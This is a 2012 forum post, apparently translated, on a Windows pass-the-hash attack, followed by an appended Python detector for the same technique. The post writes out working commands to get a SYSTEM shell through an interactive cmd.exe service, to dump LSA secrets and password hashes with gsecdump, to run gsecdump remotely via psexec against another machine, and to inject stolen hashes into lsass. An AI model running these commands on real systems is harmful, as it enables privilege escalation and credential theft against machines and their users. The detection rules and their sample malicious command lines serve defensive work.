Views: 1965 | Replies: 0

Hash injection attack

Original poster
Posted on 2012-11-6 21:09:29
To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - [url]www.sysinternals.com[/url]

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
A tip: you can use iam from the pshtools toolkit to inject the hashes just grabbed with gsecdump into the local lsass process, which is how the hash injection attack works. The foreigners really are good at this; the admins will be kept busy now. The LM/NT hashes obtained during ARP spoofing, and the ones obtained with gethash, don't actually need to be cracked at all; this is just about using the tools. As the original article puts it, whether the password is 4 characters or 127, once you have the hash it's 100% done.
Original source: [url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
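A detection-side counterpart to the post above, added here as an example and not taken from the post or from the truesec original: it runs simple rules over constructed Windows event records (System 7045 service-install and Security 4688 process-creation data, with the assumed field names ImagePath and CommandLine) and flags a service whose image is a command interpreter, an `sc create` with `type= interact` or a shell as binpath, and command lines naming the dumping tool from the post.

```python
import re

# Constructed sample records (not real logs). Keys follow the EventData names Windows
# uses for System 7045 (service installed) and Security 4688 (process created).
SAMPLE_EVENTS = [
    {"EventID": 7045, "ServiceName": "shellcmdline", "ImagePath": "C:\\WINDOWS\\system32\\cmd.exe /K start"},
    {"EventID": 7045, "ServiceName": "Spooler", "ImagePath": "C:\\WINDOWS\\system32\\spoolsv.exe"},
    {"EventID": 4688, "CommandLine": 'sc create shellcmdline binpath= "C:\\WINDOWS\\system32\\cmd.exe /K start" '
                                     'type= own type= interact'},
    {"EventID": 4688, "CommandLine": "sc query Spooler"},
    {"EventID": 4688, "CommandLine": "psexec \\\\COMPUTER -s -c gsecdump.exe -u"},
]

# Command interpreters that are never a legitimate service image on their own.
SHELLS = {"cmd.exe", "command.com", "powershell.exe", "wscript.exe", "cscript.exe"}
# Tool names taken from this page; an assumed starter list, extend it with your own.
DUMP_TOOLS = re.compile(r"\b(gsecdump|cachedump)\b", re.I)
SC_CREATE = re.compile(r'^\s*"?(?:[^"\s]*\\)?sc(?:\.exe)?"?\s+create\b', re.I)
BINPATH = re.compile(r'binpath=\s*"?([^"]+)', re.I)
INTERACT = re.compile(r"type=\s*interact\b", re.I)

def first_exe(text):
    """Lowercase basename of the first (optionally quoted) token of a path or command line."""
    m = re.match(r'\s*(?:"([^"]+)"|(\S+))', text)
    if not m:
        return ""
    return (m.group(1) or m.group(2)).replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the alert names one event raises (empty list if nothing suspicious)."""
    alerts = []
    if event.get("EventID") == 7045 and first_exe(event.get("ImagePath", "")) in SHELLS:
        alerts.append("service_image_is_shell")           # the trick as installed (System log)
    elif event.get("EventID") == 4688:
        cmd = event.get("CommandLine", "")
        if SC_CREATE.match(cmd):
            if (bp := BINPATH.search(cmd)) and first_exe(bp.group(1)) in SHELLS:
                alerts.append("sc_create_shell_service")  # the trick as typed (Security log)
            if INTERACT.search(cmd):
                alerts.append("sc_create_interactive_service")
        if DUMP_TOOLS.search(cmd):
            alerts.append("credential_dump_tool")
    return alerts

def scan(events):
    """Return [(event_index, alert_name), ...] for every alert raised over a list of events."""
    return [(i, a) for i, ev in enumerate(events) for a in classify(ev)]
```

The 7045 rule catches the service even when the creating command line was never logged, which is why both rules are worth keeping.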